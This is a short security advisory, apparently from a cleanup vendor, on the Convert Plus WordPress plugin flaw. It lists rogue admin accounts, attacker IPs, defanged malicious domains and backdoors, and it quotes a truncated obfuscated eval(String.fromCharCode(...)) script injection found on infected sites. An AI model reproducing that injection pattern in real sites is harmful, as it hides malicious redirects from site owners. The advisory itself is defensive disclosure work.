We recently cleaned several sites affected by the recent convertplug plugin vulnerability. In most cases plugin is bundled with Avada theme. All Convert Plus versions up to 3.4.2 are vulnerable to attacks.
Users should update to version 3.4.3 ASAP, as this is a critical security issue.
Attackers will create users with administrator privileges. Malicious Javascripts and backdoor files might be added later on.
That’s why we recommend a thorough analysis, followed by a malware cleanup.
Sample malicious users: [email protected], [email protected].
Malicious activity originated from Netherlands, 185.238.1.177, 5.188.62.5, jacksonblue10.ptr1.ru.
Malicious code found so far, directing users to:
hxxps://adaranth[.]com/afu.php
hxxps://css.developmyredflag[.]top
hxxp://trackcertified[.]top
hxxps://broadcasttrack[.]com
hxxps://newstext[.]biz
hxxps://yellowfakeagent[.]top
hxxps://instantreward[.]site
hxxps://www.zcpqb[.]com
hxxps://css.developmyredflag[.]top/zrt.script.min.js
Sample code:
eval(String.fromCharCode(118, 97, 114, 32, 100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59
During the cleanup process, we found malicious backdoor files located in wp-content/uploads folder. So be aware that attackers will try to regain site access.
All index.php files were corrupted as well, injected with malicious JS scripts hosted on css.developmyredflag[.]top.
To sort this contamination, you can purchase any of our plans or you can try to fix it yourself.
Make sure you’ll perform a backup before making any changes.
Useful links:
wpvulndb.com ConvertPlus <= 3.4.2: https://wpvulndb.com/vulnerabilities/9325
Wordfence report: https://www.wordfence.com/blog/2019/05/critical-vulnerability-patched-in-popular-convert-plus-plugin/
convertplug.com: https://www.convertplug.com/plus/version-3-4-3-security-update/
Magefix cleanup plans: https://www.magefix.com/pricing